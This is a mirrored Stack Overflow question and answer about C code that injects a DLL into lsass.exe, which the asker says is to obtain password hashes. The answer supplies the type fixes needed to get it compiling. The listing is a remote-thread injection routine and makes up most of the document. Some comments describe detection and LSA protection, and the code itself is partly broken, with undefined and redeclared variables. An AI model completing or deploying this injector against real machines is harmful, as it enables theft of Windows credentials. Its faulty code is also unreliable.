dll injection using C

左心房为你撑大大i 提交于 2020-01-06 08:27:33

问题


Hey, I'm trying to inject a DLL into a process, i.e. lsass.exe, to get hashes. It's a bit hacky, but I can't help it, it's my project. I have code for DLL injection, but in Visual C++ it gives errors such as:

at TEXT("LoadLibraryA"))))---->>>argument const wchar incompatible with LPCSTR

at lpFuncAddr----------->>>argument type "LPVOID" incompatible with parameter type "LPTHREAD_START_ROUTINE"

CODE:

/*
 * InjectDLL - start a thread inside the process identified by dwProcessId
 * whose start address is LoadLibraryA and whose argument is a path string
 * that this function first writes into that process.
 *
 * dwProcessId  id of the process to open.
 * lpszDLLPath  path of the DLL, as a narrow (char) string.
 *
 * Returns TRUE only if the remote thread was created and its exit code is
 * non-zero; every other path leaves bSuccess at its initial FALSE.
 *
 * NOTE(review): as posted this block does not compile. The asker quotes two
 * of the compiler errors below the listing's introduction, and the conversion
 * section conflicts with the parameter list.
 *
 * Detection / mitigation context: OpenProcess -> VirtualAllocEx ->
 * WriteProcessMemory -> CreateRemoteThread at LoadLibraryA is the classic
 * remote-thread DLL injection sequence (MITRE ATT&CK T1055.001); aimed at
 * lsass.exe, as the question states, it falls under T1003.001. Sysmon records
 * the handle request as Event ID 10 (ProcessAccess) and the thread creation
 * as Event ID 8 (CreateRemoteThread). With LSA protection (RunAsPPL) enabled,
 * lsass.exe runs as a protected process and a handle request with these
 * rights from an ordinary process is refused; Credential Guard additionally
 * moves the secrets out of the lsass.exe address space.
 */
BOOL InjectDLL(DWORD dwProcessId, LPCSTR lpszDLLPath)
{
   HANDLE  hProcess, hThread;
   LPVOID  lpBaseAddr, lpFuncAddr;
   DWORD   dwMemSize, dwExitCode;
   BOOL    bSuccess = FALSE;
   HMODULE hUserDLL;


   // Build a wide-character copy of the path in dllpath (at most newsize
   // elements). Further down, dllpath is used only to compute dwMemSize;
   // the bytes actually written to the target come from lpszDLLPath.
    char *lpszDLLPath = "hash.dll";
          size_t origsize = strlen(orig) + 1;
          const size_t newsize = 100;
          size_t convertedChars = 0;
          wchar_t dllpath[newsize];
          mbstowcs_s(&convertedChars, dllpath, origsize, orig, _TRUNCATE); 

   // Request a handle carrying thread-creation, query and VM
   // operation/write/read rights. This access mask is what process-access
   // telemetry shows for the attempt.
   if((hProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION|PROCESS_VM_OPERATION
       |PROCESS_VM_WRITE|PROCESS_VM_READ, FALSE, dwProcessId)))
   {
       // Character count of the wide copy plus one for the terminator.
       dwMemSize = wcslen(dllpath) + 1;
       // Commit a read/write region of dwMemSize bytes in the target process.
       if((lpBaseAddr = VirtualAllocEx(hProcess, NULL, dwMemSize, MEM_COMMIT, PAGE_READWRITE)))
       {
           // Copy dwMemSize bytes starting at lpszDLLPath into that region.
           if(WriteProcessMemory(hProcess, lpBaseAddr, lpszDLLPath, dwMemSize, NULL))
           {
               // Resolve LoadLibraryA in the *calling* process; that address
               // is handed to the target unchanged.
               if((hUserDLL = LoadLibrary(TEXT("kernel32.dll"))))
               {
                   if((lpFuncAddr = GetProcAddress(hUserDLL, TEXT("LoadLibraryA"))))
                   {
                       // Thread in the target: start routine lpFuncAddr,
                       // argument lpBaseAddr (the written path string).
                       if((hThread = CreateRemoteThread(hProcess, NULL, 0, lpFuncAddr, lpBaseAddr, 0, NULL)))
                       {
                           // Blocks with no timeout until the remote thread ends.
                           WaitForSingleObject(hThread, INFINITE);
                           // The exit code is the start routine's return value;
                           // non-zero is treated as "the library was loaded".
                           if(GetExitCodeThread(hThread, &dwExitCode)) {
                               bSuccess = (dwExitCode != 0) ? TRUE : FALSE;
                            }
                           CloseHandle(hThread);
                       }
                   }
                   // Drop the local kernel32.dll reference taken above.
                   FreeLibrary(hUserDLL);
                }
            }
           // Release the region allocated in the target, whether or not the
           // write or the thread creation succeeded.
           VirtualFreeEx(hProcess, lpBaseAddr, 0, MEM_RELEASE);
       }
       CloseHandle(hProcess);
   }
   return bSuccess;
}

/*
 * Program entry point: calls InjectDLL once for PROCESSID with the DLL name
 * "hash.dll" and reports the outcome in a message box. Always returns 0.
 *
 * PROCESSID is not defined anywhere in the posted listing.
 */
int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow)
{
    const BOOL bInjected = InjectDLL(PROCESSID, "hash.dll");

    /* Failure path first: error icon, then leave. */
    if (!bInjected) {
        MessageBox(NULL, TEXT("Couldn't inject DLL"), TEXT("DLL Injector"), MB_OK | MB_ICONERROR);
        return 0;
    }

    MessageBox(NULL, TEXT("DLL Injected!"), TEXT("DLL Injector"), MB_OK);
    return 0;
}

I'm a beginner at DLLs and Windows programming, so I will appreciate your help.


回答1:


It looks like your functions are expecting LPCSTR instead of LPCTSTR. Lose the TEXT() macros and it should be fine.

For the second error, you should be able to cast lpFuncAddr to an LPTHREAD_START_ROUTINE with a simple C-style cast:

 // The explicit cast addresses the second compiler error: lpFuncAddr is
 // declared LPVOID in the question's code, while this argument of
 // CreateRemoteThread is typed LPTHREAD_START_ROUTINE.
 if((hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpFuncAddr, lpBaseAddr, 0, NULL)))


来源:https://stackoverflow.com/questions/4648059/dll-injection-using-c
